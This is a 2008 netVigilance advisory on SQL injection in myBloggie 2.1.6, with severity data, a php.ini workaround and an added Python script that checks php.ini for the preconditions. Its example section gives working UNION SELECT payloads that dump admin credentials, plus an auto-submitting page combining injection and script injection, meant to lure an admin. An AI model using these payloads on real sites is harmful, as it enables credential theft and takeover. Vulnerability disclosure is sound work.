netVigilance Security Advisory
 
 
 
myBloggie version 2.1.6 Multiple SQL Injection Vulnerability

Description:

myBloggie is considered one of the simplest and most user-friendly yet feature-packed weblog systems available to date. It is built using PHP and MySQL, the web's most popular scripting language and database system, which enables myBloggie to be installed on any web server.

A security problem in the product allows attackers to perform SQL injection.

External References:
Mitre CVE: CVE-2007-1899
NVD NIST: CVE-2007-1899


Summary:
myBloggie is a weblog system built using PHP and MySQL, the web's most popular scripting language and database system, which enables myBloggie to be installed on any web server.

Successful exploitation requires PHP magic_quotes_gpc set to Off and register_globals set to "On".

Release Date:
June 30 2008

Severity:
Risk: Medium

Access Vector: Network
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS Base Score: 5.1

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: SQL Injection


SecureScout Testcase ID:
TC 17969

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL statements. This could be exploited to obtain sensitive data, modify database contents or acquire administrator privileges.

Vendor:
myWebland

Vendor Status:
The vendor was notified on April 9th 2007, but did not respond.

Workaround:
In the php.ini file, set magic_quotes_gpc = On and/or register_globals = Off.
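
To check whether a host still meets the precondition stated in the Summary (magic_quotes_gpc Off together with register_globals On), the following added example, which is not part of the original advisory, audits the text of a php.ini file. The function names, the sample files and the defaults assumed for absent directives (those of PHP releases before 5.4) are assumptions of this example.

```python
import re

# Spellings PHP treats as boolean "on" in php.ini; anything else counts as off.
TRUE_VALUES = {"1", "on", "true", "yes"}
# Assumption: built-in defaults of PHP releases before 5.4 for absent directives.
DEFAULTS = {"magic_quotes_gpc": True, "register_globals": False}

def effective_flags(ini_text, defaults=DEFAULTS):
    """Return the effective value of both directives; the last assignment wins."""
    flags = dict(defaults)
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop ';' comments
        m = re.match(r"^([A-Za-z0-9_.]+)\s*=\s*(.*)$", line)
        if not m or m.group(1) not in flags:         # directive names are case sensitive
            continue
        value = m.group(2).strip().strip("\"'").lower()
        flags[m.group(1)] = value in TRUE_VALUES
    return flags

def audit(ini_text):
    """Report whether the advisory's precondition holds for this php.ini text."""
    flags = effective_flags(ini_text)
    findings = []
    if not flags["magic_quotes_gpc"]:
        findings.append("magic_quotes_gpc is Off")
    if flags["register_globals"]:
        findings.append("register_globals is On")
    # The advisory requires BOTH conditions, which is why changing either
    # directive ("and/or" in the workaround) removes the precondition.
    return {"exposed": len(findings) == 2, "findings": findings, "flags": flags}

# Constructed sample: both preconditions from the advisory are met.
SAMPLE_EXPOSED = """[PHP]
; constructed sample file
magic_quotes_gpc = Off
register_globals = On   ; kept for a legacy application
"""

# Constructed sample: workaround applied by a later assignment that overrides the first.
SAMPLE_WORKAROUND = """[PHP]
magic_quotes_gpc = Off
register_globals = On
register_globals = Off
"""

if __name__ == "__main__":
    for name, text in (("exposed", SAMPLE_EXPOSED), ("workaround", SAMPLE_WORKAROUND)):
        print(name, audit(text))
```

Per-directory overrides such as `php_flag` lines in `.htaccess` are not read by this check, so a clean php.ini result should be confirmed against the running configuration.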

Example:

SQL Injection Vulnerability 1:

Create an HTML file with the following content:
<html>
<body>
<form action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser" method="POST">
<input type="submit" name="user_id" value="1 #' UNION SELECT CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1 FROM `mb_user` /*">
</form>
</body>
</html>

REQUEST:
Browse this file and click on the button
REPLY:
<tr><td colspan="3" class="spacer6"></td></tr>
<tr><td></td><td></td><td align="right">
<span class="f10pxgrey">Category : <a class="std" href="?mode=viewcat&cat_id=1">
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN PASSWORD]</a>
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif" alt="" />
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |
<img src="./templates/aura/images/trackback.gif" />

SQL Injection Vulnerability 2:

(SQL Injection + XSS Attack Vulnerability)

Create an HTML file with the following content and place it, for example, at http://somedomain.com/file.html:
<html>
<body onLoad="document.forms(0).submit();">
<form action=" http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" method="POST"> <input type="hidden" name="post_id" value="-1' UNION SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`), '</textarea><script>alert(document.post.subject.value)</script>', 5,6,7 FROM `mb_user`#">
</form>
</body>
</html>
REQUEST:
Induce a Mybloggie admin to browse the malicious page.
http://somedomain.com/file.html

REPLY:
Page containing username and password for Mybloggie admin account.



Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com


Copyright © 2004-2011, netVigilance, Inc. All rights reserved.